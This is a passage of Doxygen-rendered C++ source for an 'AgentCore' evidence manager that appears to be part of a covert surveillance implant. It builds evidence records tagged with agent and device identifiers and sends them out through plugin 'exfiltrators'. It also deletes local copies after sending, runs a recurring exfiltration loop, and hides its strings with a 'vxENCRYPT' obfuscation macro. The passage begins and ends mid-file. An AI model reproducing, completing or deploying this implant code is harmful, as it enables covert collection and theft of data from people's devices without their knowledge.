<div class="line"><a name="l00183"></a><span class="lineno">  183</span>&#160;    <span class="keywordtype">int</span> res = p-&gt;<a class="code" href="classAgentPlugin_1_1IPlugin.html#acc8da2fca63545b8e6e2bb841b6981cb">start</a>(&amp;pars);</div>
<div class="line"><a name="l00184"></a><span class="lineno">  184</span>&#160;    <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00185"></a><span class="lineno">  185</span>&#160;        res = ECANCELED;</div>
<div class="line"><a name="l00186"></a><span class="lineno">  186</span>&#160;    }</div>
<div class="line"><a name="l00187"></a><span class="lineno">  187</span>&#160;    _walkRunning = <span class="keyword">false</span>;</div>
<div class="line"><a name="l00188"></a><span class="lineno">  188</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00189"></a><span class="lineno">  189</span>&#160;}</div>
<div class="line"><a name="l00190"></a><span class="lineno">  190</span>&#160; </div>
<div class="line"><a name="l00199"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#ab34fe43e5a70c9ef2a01a9668aaff803">  199</a></span>&#160;<span class="keywordtype">void</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#ab34fe43e5a70c9ef2a01a9668aaff803">CEvidenceManager::exfiltrateRoutine</a>(<span class="keywordtype">char</span> *path, uint8_t *data, <span class="keywordtype">int</span> size, uint32_t threadId) {</div>
<div class="line"><a name="l00200"></a><span class="lineno">  200</span>&#160; </div>
<div class="line"><a name="l00201"></a><span class="lineno">  201</span>&#160;    <span class="comment">// get exfiltrators</span></div>
<div class="line"><a name="l00202"></a><span class="lineno">  202</span>&#160;    std::vector&lt;IPlugin *&gt; exfiltrators = getExfiltrators();</div>
<div class="line"><a name="l00203"></a><span class="lineno">  203</span>&#160;    <span class="keywordflow">if</span> (!exfiltrators.empty()) {</div>
<div class="line"><a name="l00204"></a><span class="lineno">  204</span>&#160;        <span class="comment">// if there&#39;s exfiltrator plugins loaded</span></div>
<div class="line"><a name="l00205"></a><span class="lineno">  205</span>&#160;        <span class="keywordflow">for</span> (<a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a>* p : exfiltrators) {</div>
<div class="line"><a name="l00206"></a><span class="lineno">  206</span>&#160;            <span class="comment">// build start parameters and call each exfiltrator start routine until one succeeds</span></div>
<div class="line"><a name="l00207"></a><span class="lineno">  207</span>&#160;            <a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">EvidenceStartParams</a> pars={0};</div>
<div class="line"><a name="l00208"></a><span class="lineno">  208</span>&#160;            pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">mode</a> = <a class="code" href="group__EVIDENCE__INTERNAL.html#gabc3d9ed56f1b62fac4fdea93d2dd7646">EVIDENCE_EXFILTRATE</a>;</div>
<div class="line"><a name="l00209"></a><span class="lineno">  209</span>&#160;            pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">in</a> = data;</div>
<div class="line"><a name="l00210"></a><span class="lineno">  210</span>&#160;            pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#ga48e7b89694845643759212d026351465">inSize</a> = size;</div>
<div class="line"><a name="l00211"></a><span class="lineno">  211</span>&#160;            pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">evidencePath</a> = (<span class="keywordtype">char</span>*)path;</div>
<div class="line"><a name="l00212"></a><span class="lineno">  212</span>&#160;            <span class="keywordtype">int</span> res = p-&gt;start(&amp;pars);</div>
<div class="line"><a name="l00213"></a><span class="lineno">  213</span>&#160; </div>
<div class="line"><a name="l00214"></a><span class="lineno">  214</span>&#160;            <span class="comment">// done</span></div>
<div class="line"><a name="l00215"></a><span class="lineno">  215</span>&#160;            <span class="keywordflow">if</span> (res == 0) {</div>
<div class="line"><a name="l00216"></a><span class="lineno">  216</span>&#160;                <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;SUCCESS exfiltrating evidence %s through %s&quot;</span>, path, p-&gt;internalName());</div>
<div class="line"><a name="l00217"></a><span class="lineno">  217</span>&#160; </div>
<div class="line"><a name="l00218"></a><span class="lineno">  218</span>&#160;                <span class="comment">// remove the evidence too</span></div>
<div class="line"><a name="l00219"></a><span class="lineno">  219</span>&#160;                removeEvidence(path);</div>
<div class="line"><a name="l00220"></a><span class="lineno">  220</span>&#160;            }</div>
<div class="line"><a name="l00221"></a><span class="lineno">  221</span>&#160;            <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00222"></a><span class="lineno">  222</span>&#160;                <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;ERROR exfiltrating evidence %s through %s&quot;</span>, path, p-&gt;internalName());</div>
<div class="line"><a name="l00223"></a><span class="lineno">  223</span>&#160;            }</div>
<div class="line"><a name="l00224"></a><span class="lineno">  224</span>&#160; </div>
<div class="line"><a name="l00225"></a><span class="lineno">  225</span>&#160;            <span class="keywordflow">if</span> (res == 0) {</div>
<div class="line"><a name="l00226"></a><span class="lineno">  226</span>&#160;                <span class="comment">// exfiltrator succeeded !</span></div>
<div class="line"><a name="l00227"></a><span class="lineno">  227</span>&#160;                <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00228"></a><span class="lineno">  228</span>&#160;            }</div>
<div class="line"><a name="l00229"></a><span class="lineno">  229</span>&#160;        }</div>
<div class="line"><a name="l00230"></a><span class="lineno">  230</span>&#160;    }</div>
<div class="line"><a name="l00231"></a><span class="lineno">  231</span>&#160; </div>
<div class="line"><a name="l00232"></a><span class="lineno">  232</span>&#160;    <span class="keywordflow">if</span> (threadId != 0) {</div>
<div class="line"><a name="l00233"></a><span class="lineno">  233</span>&#160;        <span class="comment">// we are a spawned thread, delete from list</span></div>
<div class="line"><a name="l00234"></a><span class="lineno">  234</span>&#160;        <a class="code" href="CMutex_8h.html#a945e98d6eab62f3906153938a8156e30">MUTEX_GUARD</a>(_threadsLock.stdMutex());</div>
<div class="line"><a name="l00235"></a><span class="lineno">  235</span>&#160;        <span class="keywordflow">for</span>(<span class="keyword">auto</span> it = _exThreads.begin(); it != _exThreads.end();) {</div>
<div class="line"><a name="l00236"></a><span class="lineno">  236</span>&#160;            <span class="comment">// in the pair, first is the key</span></div>
<div class="line"><a name="l00237"></a><span class="lineno">  237</span>&#160;            <span class="keywordflow">if</span> (it-&gt;first == threadId) {</div>
<div class="line"><a name="l00238"></a><span class="lineno">  238</span>&#160;                <span class="comment">// thread id found, call destructor</span></div>
<div class="line"><a name="l00239"></a><span class="lineno">  239</span>&#160;                <span class="keyword">delete</span> it-&gt;second;</div>
<div class="line"><a name="l00240"></a><span class="lineno">  240</span>&#160; </div>
<div class="line"><a name="l00241"></a><span class="lineno">  241</span>&#160;                <span class="comment">// remove from list</span></div>
<div class="line"><a name="l00242"></a><span class="lineno">  242</span>&#160;                it = _exThreads.erase(it);</div>
<div class="line"><a name="l00243"></a><span class="lineno">  243</span>&#160;                <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="stringliteral">&quot;removing thread %x from the exfiltrator threads&quot;</span>, threadId);</div>
<div class="line"><a name="l00244"></a><span class="lineno">  244</span>&#160;            }</div>
<div class="line"><a name="l00245"></a><span class="lineno">  245</span>&#160;            <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00246"></a><span class="lineno">  246</span>&#160;                ++it;</div>
<div class="line"><a name="l00247"></a><span class="lineno">  247</span>&#160;            }</div>
<div class="line"><a name="l00248"></a><span class="lineno">  248</span>&#160;        }</div>
<div class="line"><a name="l00249"></a><span class="lineno">  249</span>&#160;    }</div>
<div class="line"><a name="l00250"></a><span class="lineno">  250</span>&#160; </div>
<div class="line"><a name="l00251"></a><span class="lineno">  251</span>&#160;    <span class="comment">// finally free the data and path buffers</span></div>
<div class="line"><a name="l00252"></a><span class="lineno">  252</span>&#160;    CMemory::free(data);</div>
<div class="line"><a name="l00253"></a><span class="lineno">  253</span>&#160;    CMemory::free(path);</div>
<div class="line"><a name="l00254"></a><span class="lineno">  254</span>&#160;}</div>
<div class="line"><a name="l00255"></a><span class="lineno">  255</span>&#160; </div>
<div class="line"><a name="l00256"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#aaae13dba01ee5fb115ca8389f50ac11d">  256</a></span>&#160;<span class="keywordtype">void</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#aaae13dba01ee5fb115ca8389f50ac11d">CEvidenceManager::exfiltrateEvidence</a>(<span class="keywordtype">char</span> *path, uint8_t *data, <span class="keywordtype">int</span> size, <span class="keywordtype">bool</span> spawn) {</div>
<div class="line"><a name="l00257"></a><span class="lineno">  257</span>&#160;    <span class="comment">// check if the same evidence is being exfiltrating by another thread</span></div>
<div class="line"><a name="l00258"></a><span class="lineno">  258</span>&#160;    <span class="keywordtype">bool</span> skip = <span class="keyword">false</span>;</div>
<div class="line"><a name="l00259"></a><span class="lineno">  259</span>&#160;    <span class="keywordtype">char</span> current[<span class="keyword">sizeof</span>(_exfiltratingCurrent)] = {0};</div>
<div class="line"><a name="l00260"></a><span class="lineno">  260</span>&#160;    _exLock.lock();</div>
<div class="line"><a name="l00261"></a><span class="lineno">  261</span>&#160;    strncpy(current,_exfiltratingCurrent,<span class="keyword">sizeof</span>(current));</div>
<div class="line"><a name="l00262"></a><span class="lineno">  262</span>&#160;    <span class="keywordflow">if</span> (strcmp(current,path) == 0) {</div>
<div class="line"><a name="l00263"></a><span class="lineno">  263</span>&#160;        <a class="code" href="CLog_8h.html#a111656e99a3f411e44b064c32a0d55af">DBGLOGW</a>(<span class="stringliteral">&quot;skipping evidence %s (currently exfiltrating by another thread)&quot;</span>, current);</div>
<div class="line"><a name="l00264"></a><span class="lineno">  264</span>&#160;        skip = <span class="keyword">true</span>;</div>
<div class="line"><a name="l00265"></a><span class="lineno">  265</span>&#160;    }</div>
<div class="line"><a name="l00266"></a><span class="lineno">  266</span>&#160;    <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00267"></a><span class="lineno">  267</span>&#160;        <span class="comment">// indicates the current path as currently exfiltrating....</span></div>
<div class="line"><a name="l00268"></a><span class="lineno">  268</span>&#160;        strncpy(_exfiltratingCurrent, path, <span class="keyword">sizeof</span>(_exfiltratingCurrent));</div>
<div class="line"><a name="l00269"></a><span class="lineno">  269</span>&#160;    }</div>
<div class="line"><a name="l00270"></a><span class="lineno">  270</span>&#160;    _exLock.unlock();</div>
<div class="line"><a name="l00271"></a><span class="lineno">  271</span>&#160;    <span class="keywordflow">if</span> (skip) {</div>
<div class="line"><a name="l00272"></a><span class="lineno">  272</span>&#160;        <span class="comment">// already exfiltrating...</span></div>
<div class="line"><a name="l00273"></a><span class="lineno">  273</span>&#160;        <span class="keywordflow">return</span>;</div>
<div class="line"><a name="l00274"></a><span class="lineno">  274</span>&#160;    }</div>
<div class="line"><a name="l00275"></a><span class="lineno">  275</span>&#160; </div>
<div class="line"><a name="l00276"></a><span class="lineno">  276</span>&#160;    <span class="keywordflow">if</span> (!spawn) {</div>
<div class="line"><a name="l00277"></a><span class="lineno">  277</span>&#160;        <span class="comment">// just call the exfiltrate routine directly</span></div>
<div class="line"><a name="l00278"></a><span class="lineno">  278</span>&#160;        exfiltrateRoutine(path, data, size, 0);</div>
<div class="line"><a name="l00279"></a><span class="lineno">  279</span>&#160;    }</div>
<div class="line"><a name="l00280"></a><span class="lineno">  280</span>&#160;    <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00281"></a><span class="lineno">  281</span>&#160;        <span class="comment">// use a dedicated thread, with an unique id</span></div>
<div class="line"><a name="l00282"></a><span class="lineno">  282</span>&#160;        uint32_t threadId = <a class="code" href="classAgentCorePrivate_1_1CAppContext.html#aa9de297be01071e73dc46b05ada0a884">CAppContext::instance</a>()-&gt;<a class="code" href="classAgentCorePrivate_1_1CAppContext.html#ab00e23b04f5d67da7c5135ff8ca7aa7a">rng</a>()-&gt;<a class="code" href="classBdUtils_1_1CRNG.html#afb9a4a337f5ffa03f51b169de99b31c7">nextRand</a>() + time(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00283"></a><span class="lineno">  283</span>&#160;        <a class="code" href="classBdUtils_1_1CThread.html">CThread</a>* t = <span class="keyword">new</span> <a class="code" href="classBdUtils_1_1CThread.html">CThread</a>(<span class="keyword">true</span>, &amp;<a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#ab34fe43e5a70c9ef2a01a9668aaff803">CEvidenceManager::exfiltrateRoutine</a>, <span class="keyword">this</span>, path, data, size, threadId);</div>
<div class="line"><a name="l00284"></a><span class="lineno">  284</span>&#160; </div>
<div class="line"><a name="l00285"></a><span class="lineno">  285</span>&#160;        <span class="comment">// add to the exfiltrator threads</span></div>
<div class="line"><a name="l00286"></a><span class="lineno">  286</span>&#160;        <a class="code" href="CMutex_8h.html#a945e98d6eab62f3906153938a8156e30">MUTEX_GUARD</a>(_threadsLock.stdMutex());</div>
<div class="line"><a name="l00287"></a><span class="lineno">  287</span>&#160;        _exThreads.insert(std::pair&lt;uint32_t, CThread*&gt;(threadId, t));</div>
<div class="line"><a name="l00288"></a><span class="lineno">  288</span>&#160;        <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="stringliteral">&quot;added thread %x to the exfiltrator threads&quot;</span>, threadId);</div>
<div class="line"><a name="l00289"></a><span class="lineno">  289</span>&#160;    }</div>
<div class="line"><a name="l00290"></a><span class="lineno">  290</span>&#160;}</div>
<div class="line"><a name="l00291"></a><span class="lineno">  291</span>&#160; </div>
<div class="line"><a name="l00295"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#ad93abbe81d3b0740554dae7b85c6a617">  295</a></span>&#160;<span class="keywordtype">void</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#ad93abbe81d3b0740554dae7b85c6a617">CEvidenceManager::recurrentExfiltratorThread</a>() {</div>
<div class="line"><a name="l00296"></a><span class="lineno">  296</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="stringliteral">&quot;started the recurrent exfiltrator thread&quot;</span>);</div>
<div class="line"><a name="l00297"></a><span class="lineno">  297</span>&#160; </div>
<div class="line"><a name="l00298"></a><span class="lineno">  298</span>&#160;    <span class="keywordflow">while</span> (1) {</div>
<div class="line"><a name="l00299"></a><span class="lineno">  299</span>&#160; </div>
<div class="line"><a name="l00300"></a><span class="lineno">  300</span>&#160;        <span class="comment">// try to exfiltrate all evidences</span></div>
<div class="line"><a name="l00301"></a><span class="lineno">  301</span>&#160;        walkEvidences();</div>
<div class="line"><a name="l00302"></a><span class="lineno">  302</span>&#160; </div>
<div class="line"><a name="l00303"></a><span class="lineno">  303</span>&#160;        <span class="comment">// wait interval</span></div>
<div class="line"><a name="l00304"></a><span class="lineno">  304</span>&#160;        JsonObject&amp; config = <a class="code" href="classAgentCorePrivate_1_1CConfigManager.html#a8224b013ac9257a74090a14b4f5c0e07">CConfigManager::instance</a>()-&gt;<a class="code" href="classAgentCorePrivate_1_1CConfigManager.html#a1a8ccc831017ddde2f752ba078b4cc61">core</a>();</div>
<div class="line"><a name="l00305"></a><span class="lineno">  305</span>&#160;        <span class="keywordtype">int</span> interval = config[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;recurrent_exfiltrate_interval&quot;</span>)];</div>
<div class="line"><a name="l00306"></a><span class="lineno">  306</span>&#160;        <span class="keywordflow">if</span> (interval == 0) {</div>
<div class="line"><a name="l00307"></a><span class="lineno">  307</span>&#160;            <span class="comment">// use default, 10 minutes</span></div>
<div class="line"><a name="l00308"></a><span class="lineno">  308</span>&#160;            interval = 10*60;</div>
<div class="line"><a name="l00309"></a><span class="lineno">  309</span>&#160;        }</div>
<div class="line"><a name="l00310"></a><span class="lineno">  310</span>&#160;        <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;waiting recurrent_exfiltrate_interval=%d seconds&quot;</span>, interval);</div>
<div class="line"><a name="l00311"></a><span class="lineno">  311</span>&#160;        <span class="keywordflow">if</span> (<a class="code" href="classAgentCorePrivate_1_1CAppContext.html#aa9de297be01071e73dc46b05ada0a884">CAppContext::instance</a>()-&gt;waitClosingSignaled(interval * 1000) == <span class="keyword">true</span>) {</div>
<div class="line"><a name="l00312"></a><span class="lineno">  312</span>&#160;            <span class="comment">// agent is terminating!</span></div>
<div class="line"><a name="l00313"></a><span class="lineno">  313</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00314"></a><span class="lineno">  314</span>&#160;        }</div>
<div class="line"><a name="l00315"></a><span class="lineno">  315</span>&#160;    }</div>
<div class="line"><a name="l00316"></a><span class="lineno">  316</span>&#160;    <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;recurrent exfiltrator thread exiting!&quot;</span>);</div>
<div class="line"><a name="l00317"></a><span class="lineno">  317</span>&#160;}</div>
<div class="line"><a name="l00318"></a><span class="lineno">  318</span>&#160; </div>
<div class="line"><a name="l00319"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#a6833a578790c66c9c8f45d3523451844">  319</a></span>&#160;<a class="code" href="classBdUtils_1_1CJson.html">CJson</a>* <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#a6833a578790c66c9c8f45d3523451844">CEvidenceManager::initializeEvidenceJson</a>(<span class="keyword">const</span> <span class="keywordtype">char</span> *type, uint32_t cmdId, uint32_t batchId) {</div>
<div class="line"><a name="l00320"></a><span class="lineno">  320</span>&#160;    <span class="comment">// initialize evidence</span></div>
<div class="line"><a name="l00321"></a><span class="lineno">  321</span>&#160;    <a class="code" href="classBdUtils_1_1CJson.html">CJson</a>* js = <span class="keyword">new</span> <a class="code" href="classBdUtils_1_1CJson.html">CJson</a>();</div>
<div class="line"><a name="l00322"></a><span class="lineno">  322</span>&#160;    <span class="keywordtype">char</span> tmp[260];</div>
<div class="line"><a name="l00323"></a><span class="lineno">  323</span>&#160; </div>
<div class="line"><a name="l00324"></a><span class="lineno">  324</span>&#160;    <span class="comment">// create body and header</span></div>
<div class="line"><a name="l00325"></a><span class="lineno">  325</span>&#160;    JsonObject&amp; body = js-&gt;<a class="code" href="classBdUtils_1_1CJson.html#af15ef1aac8fc2d2637d19b6442271cdb">node</a>().createNestedObject(<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;body&quot;</span>));</div>
<div class="line"><a name="l00326"></a><span class="lineno">  326</span>&#160;    JsonObject&amp; hdr = js-&gt;<a class="code" href="classBdUtils_1_1CJson.html#af15ef1aac8fc2d2637d19b6442271cdb">node</a>().createNestedObject(<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;header&quot;</span>));</div>
<div class="line"><a name="l00327"></a><span class="lineno">  327</span>&#160; </div>
<div class="line"><a name="l00328"></a><span class="lineno">  328</span>&#160;    <span class="comment">// type=evidence</span></div>
<div class="line"><a name="l00329"></a><span class="lineno">  329</span>&#160;    strcpy(tmp, <a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;evidence&quot;</span>));</div>
<div class="line"><a name="l00330"></a><span class="lineno">  330</span>&#160;    hdr[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;type&quot;</span>)] = tmp;</div>
<div class="line"><a name="l00331"></a><span class="lineno">  331</span>&#160; </div>
<div class="line"><a name="l00332"></a><span class="lineno">  332</span>&#160;    <span class="comment">// agentid</span></div>
<div class="line"><a name="l00333"></a><span class="lineno">  333</span>&#160;    hdr[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;agentid&quot;</span>)] = <a class="code" href="classAgentCorePrivate_1_1CBinaryPatch.html#a69c49d2ab4e0acd6c7b433e6b81d0169">CBinaryPatch::instance</a>()-&gt;<a class="code" href="classAgentCorePrivate_1_1CBinaryPatch.html#aa60b302df302d4dea42c1014457bccba">agentId</a>();</div>
<div class="line"><a name="l00334"></a><span class="lineno">  334</span>&#160; </div>
<div class="line"><a name="l00335"></a><span class="lineno">  335</span>&#160;    <span class="comment">// timestamp</span></div>
<div class="line"><a name="l00336"></a><span class="lineno">  336</span>&#160;    hdr[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;timestamp&quot;</span>)] = CTime::now();</div>
<div class="line"><a name="l00337"></a><span class="lineno">  337</span>&#160; </div>
<div class="line"><a name="l00338"></a><span class="lineno">  338</span>&#160;    <span class="keywordflow">if</span> (cmdId) {</div>
<div class="line"><a name="l00339"></a><span class="lineno">  339</span>&#160;        <span class="comment">// add command id generating this evidence</span></div>
<div class="line"><a name="l00340"></a><span class="lineno">  340</span>&#160;        hdr[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;cmdid&quot;</span>)] = cmdId;</div>
<div class="line"><a name="l00341"></a><span class="lineno">  341</span>&#160;    }</div>
<div class="line"><a name="l00342"></a><span class="lineno">  342</span>&#160;    <span class="keywordflow">if</span> (batchId) {</div>
<div class="line"><a name="l00343"></a><span class="lineno">  343</span>&#160;        <span class="comment">// add batch id generating this evidence</span></div>
<div class="line"><a name="l00344"></a><span class="lineno">  344</span>&#160;        hdr[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;batchid&quot;</span>)] = batchId;</div>
<div class="line"><a name="l00345"></a><span class="lineno">  345</span>&#160;    }</div>
<div class="line"><a name="l00346"></a><span class="lineno">  346</span>&#160; </div>
<div class="line"><a name="l00347"></a><span class="lineno">  347</span>&#160;    <span class="comment">// add evidence type</span></div>
<div class="line"><a name="l00348"></a><span class="lineno">  348</span>&#160;    body[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;type&quot;</span>)] = type;</div>
<div class="line"><a name="l00349"></a><span class="lineno">  349</span>&#160;    <span class="keywordflow">return</span> js;</div>
<div class="line"><a name="l00350"></a><span class="lineno">  350</span>&#160;}</div>
<div class="line"><a name="l00351"></a><span class="lineno">  351</span>&#160; </div>
<div class="line"><a name="l00352"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#adf1615fd208f9b7b44277f43c500f354">  352</a></span>&#160;<span class="keywordtype">int</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#adf1615fd208f9b7b44277f43c500f354">CEvidenceManager::addCommandResultEvidence</a>(<span class="keywordtype">int</span> res, <span class="keyword">const</span> <span class="keywordtype">char</span> *resStr, uint32_t cmdId, uint32_t batchId) {</div>
<div class="line"><a name="l00353"></a><span class="lineno">  353</span>&#160;    <span class="comment">// initialize evidence</span></div>
<div class="line"><a name="l00354"></a><span class="lineno">  354</span>&#160;    <a class="code" href="classBdUtils_1_1CJson.html">CJson</a>* js = initializeEvidenceJson(<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;cmdresult&quot;</span>), cmdId, batchId);</div>
<div class="line"><a name="l00355"></a><span class="lineno">  355</span>&#160; </div>
<div class="line"><a name="l00356"></a><span class="lineno">  356</span>&#160;    <span class="comment">// add fields</span></div>
<div class="line"><a name="l00357"></a><span class="lineno">  357</span>&#160;    JsonObject&amp; body = <a class="code" href="classAgentCorePrivate_1_1CAgentMsgUtils.html#a42eac2a197c3b8dfd47e4c27008898f4">CAgentMsgUtils::body</a>(js-&gt;<a class="code" href="classBdUtils_1_1CJson.html#af15ef1aac8fc2d2637d19b6442271cdb">node</a>());</div>
<div class="line"><a name="l00358"></a><span class="lineno">  358</span>&#160;    body[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;res&quot;</span>)]=res;</div>
<div class="line"><a name="l00359"></a><span class="lineno">  359</span>&#160;    <span class="keywordflow">if</span> (resStr) {</div>
<div class="line"><a name="l00360"></a><span class="lineno">  360</span>&#160;        <span class="comment">// add result string</span></div>
<div class="line"><a name="l00361"></a><span class="lineno">  361</span>&#160;        body[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;res_string&quot;</span>)]=resStr;</div>
<div class="line"><a name="l00362"></a><span class="lineno">  362</span>&#160;    }</div>
<div class="line"><a name="l00363"></a><span class="lineno">  363</span>&#160; </div>
<div class="line"><a name="l00364"></a><span class="lineno">  364</span>&#160;    <span class="keywordtype">char</span>* str = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00365"></a><span class="lineno">  365</span>&#160;    <span class="keywordtype">char</span>* evStr = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00366"></a><span class="lineno">  366</span>&#160;    <span class="keywordtype">int</span> r = 0;</div>
<div class="line"><a name="l00367"></a><span class="lineno">  367</span>&#160;    <span class="keywordflow">do</span> {</div>
<div class="line"><a name="l00368"></a><span class="lineno">  368</span>&#160;        <span class="comment">// add device key</span></div>
<div class="line"><a name="l00369"></a><span class="lineno">  369</span>&#160;        CString::toHexString(<a class="code" href="classAgentCorePrivate_1_1CAppContext.html#aa9de297be01071e73dc46b05ada0a884">CAppContext::instance</a>()-&gt;deviceKey(), <a class="code" href="CDevice_8h.html#a773c5a27ae7a792622fc7e766e4778fe">DEVICE_ID_SIZE</a>, &amp;str);</div>
<div class="line"><a name="l00370"></a><span class="lineno">  370</span>&#160;        body[<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<span class="stringliteral">&quot;devicekey&quot;</span>)]=str;</div>
<div class="line"><a name="l00371"></a><span class="lineno">  371</span>&#160; </div>
<div class="line"><a name="l00372"></a><span class="lineno">  372</span>&#160;        <span class="comment">// to string</span></div>
<div class="line"><a name="l00373"></a><span class="lineno">  373</span>&#160;        evStr = js-&gt;<a class="code" href="classBdUtils_1_1CJson.html#ab12f6f187b5d3e36d12cd284469ca31a">toString</a>();</div>
<div class="line"><a name="l00374"></a><span class="lineno">  374</span>&#160;        <span class="keywordflow">if</span> (!evStr) {</div>
<div class="line"><a name="l00375"></a><span class="lineno">  375</span>&#160;            r = ENOMEM;</div>
<div class="line"><a name="l00376"></a><span class="lineno">  376</span>&#160;            <span class="keywordflow">break</span>;</div>
<div class="line"><a name="l00377"></a><span class="lineno">  377</span>&#160;        }</div>
<div class="line"><a name="l00378"></a><span class="lineno">  378</span>&#160; </div>
<div class="line"><a name="l00379"></a><span class="lineno">  379</span>&#160;        <span class="comment">// add evidence</span></div>
<div class="line"><a name="l00380"></a><span class="lineno">  380</span>&#160;        r = addEvidence(evStr);</div>
<div class="line"><a name="l00381"></a><span class="lineno">  381</span>&#160;    } <span class="keywordflow">while</span>(0);</div>
<div class="line"><a name="l00382"></a><span class="lineno">  382</span>&#160;    <span class="keyword">delete</span> js;</div>
<div class="line"><a name="l00383"></a><span class="lineno">  383</span>&#160;    CMemory::free(str);</div>
<div class="line"><a name="l00384"></a><span class="lineno">  384</span>&#160;    <span class="keywordflow">return</span> r;</div>
<div class="line"><a name="l00385"></a><span class="lineno">  385</span>&#160;}</div>
<div class="line"><a name="l00386"></a><span class="lineno">  386</span>&#160; </div>
<div class="line"><a name="l00387"></a><span class="lineno"><a class="line" href="classAgentCorePrivate_1_1CEvidenceManager.html#aef07ebc986685e7f77a62c59cb654600">  387</a></span>&#160;<span class="keywordtype">int</span> <a class="code" href="classAgentCorePrivate_1_1CEvidenceManager.html#aef07ebc986685e7f77a62c59cb654600">CEvidenceManager::addEvidence</a>(<span class="keyword">const</span> <span class="keywordtype">char</span> *json) {</div>
<div class="line"><a name="l00388"></a><span class="lineno">  388</span>&#160;    <span class="keywordflow">if</span> (!json) {</div>
<div class="line"><a name="l00389"></a><span class="lineno">  389</span>&#160;        <span class="keywordflow">return</span> EINVAL;</div>
<div class="line"><a name="l00390"></a><span class="lineno">  390</span>&#160;    }</div>
<div class="line"><a name="l00391"></a><span class="lineno">  391</span>&#160; </div>
<div class="line"><a name="l00392"></a><span class="lineno">  392</span>&#160;    <span class="comment">// calls into modevidence plugin</span></div>
<div class="line"><a name="l00393"></a><span class="lineno">  393</span>&#160;    <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a> *p = getModEvidence();</div>
<div class="line"><a name="l00394"></a><span class="lineno">  394</span>&#160;    <span class="keywordflow">if</span> (!p) {</div>
<div class="line"><a name="l00395"></a><span class="lineno">  395</span>&#160;        <span class="keywordflow">return</span> ECANCELED;</div>
<div class="line"><a name="l00396"></a><span class="lineno">  396</span>&#160;    }</div>
<div class="line"><a name="l00397"></a><span class="lineno">  397</span>&#160; </div>
<div class="line"><a name="l00398"></a><span class="lineno">  398</span>&#160;    <span class="comment">// build start parameters and call plugin&#39;s start routine</span></div>
